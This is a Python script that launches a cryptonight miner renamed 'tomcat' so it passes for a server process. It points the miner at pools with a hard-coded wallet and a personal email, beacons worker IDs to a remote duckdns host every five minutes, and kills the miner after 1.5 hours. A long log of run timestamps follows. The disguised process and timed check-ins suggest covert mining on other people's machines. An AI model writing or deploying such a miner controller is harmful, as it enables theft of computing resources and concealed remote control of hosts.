import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:54:06.509528
#2018-02-17 16:43:05.307408
#2018-02-17 18:31:05.973902
#2018-02-17 20:19:04.944223
#2018-02-17 22:06:01.804835
#2018-02-17 23:50:05.842867
#2018-02-18 01:40:07.001343
#2018-02-18 03:27:05.117746
#2018-02-18 05:14:06.573705
#2018-02-18 07:07:01.425159
#2018-02-18 08:55:02.020493
#2018-02-18 10:41:07.232783
#2018-02-18 12:27:06.437466
#2018-02-18 14:15:08.102169
#2018-02-18 16:07:05.306224
#2018-02-18 17:55:08.472244
#2018-02-18 19:42:05.402138
#2018-02-18 21:27:04.434773
#2018-02-18 23:16:05.102540
#2018-02-19 01:02:05.477264
#2018-02-19 02:49:05.263543
#2018-02-19 04:34:06.307702
#2018-02-19 06:19:05.132564
#2018-02-19 08:07:05.191248
#2018-02-19 09:57:06.333000
#2018-02-19 11:47:05.864806
#2018-02-19 13:34:04.138390
#2018-02-19 15:23:05.626402
#2018-02-19 17:11:04.446157
#2018-02-19 18:57:04.860221
#2018-02-19 20:45:06.594399
#2018-02-19 22:33:03.890104
#2018-02-20 00:17:07.666183
#2018-02-20 02:07:06.728636
#2018-02-20 03:58:04.741276
#2018-02-20 05:42:03.902414
#2018-02-20 07:27:07.931202
#2018-02-20 09:12:06.986484
#2018-02-20 10:55:05.400703
#2018-02-20 12:43:08.482811
#2018-02-20 14:27:04.381260
#2018-02-20 16:12:01.566563
#2018-02-20 17:59:02.169817
#2018-02-20 19:52:08.683155
#2018-02-20 21:39:05.773738
#2018-02-20 23:20:03.116915
#2018-02-21 01:05:07.376537
#2018-02-21 02:52:04.719159
#2018-02-21 04:39:05.063706
#2018-02-21 06:28:05.658804
#2018-02-21 08:14:06.863522
#2018-02-21 10:01:04.311241
#2018-02-21 11:50:12.570571
#2018-02-21 13:41:01.504866
#2018-02-21 15:25:03.066907
#2018-02-21 17:16:01.938513
#2018-02-21 19:04:05.447084
#2018-02-21 20:52:06.092692
#2018-02-21 22:38:06.162200
#2018-02-22 00:26:07.323072
#2018-02-22 02:13:03.702635
#2018-02-22 03:58:07.555670
#2018-02-22 05:45:08.034667
#2018-02-22 07:32:01.953074
#2018-02-22 09:19:01.915876
#2018-02-22 11:05:10.857914
#2018-02-22 12:51:12.255657
#2018-02-22 14:38:04.560134
#2018-02-22 16:25:05.273751
#2018-02-22 18:13:01.426170
#2018-02-22 20:02:07.694095
#2018-02-22 21:50:04.607825
#2018-02-22 23:37:07.944223
#2018-02-23 01:24:05.337219
#2018-02-23 03:10:01.762398
#2018-02-23 04:58:01.638107
#2018-02-23 06:43:04.088566
#2018-02-23 08:33:05.367453
#2018-02-23 10:48:05.389387
#2018-02-23 12:46:06.430026
#2018-02-23 14:31:05.422997
#2018-02-23 16:21:06.947349
#2018-02-23 18:07:08.729812
#2018-02-23 19:52:06.497852
#2018-02-23 21:36:04.997042
#2018-02-23 23:23:06.347447
#2018-02-24 01:16:06.740621
#2018-02-24 03:07:05.101109
#2018-02-24 04:53:03.392212
#2018-02-24 06:37:05.002185
#2018-02-24 08:26:06.114896
#2018-02-24 10:12:01.334235
#2018-02-24 12:06:02.176542
#2018-02-24 13:54:07.412466
#2018-02-24 15:44:04.915257
#2018-02-24 17:41:06.241663
#2018-02-24 19:26:07.595675
#2018-02-24 21:16:06.430052
#2018-02-24 23:52:07.214138
#2018-02-25 03:34:06.125632
#2018-02-25 07:10:08.525908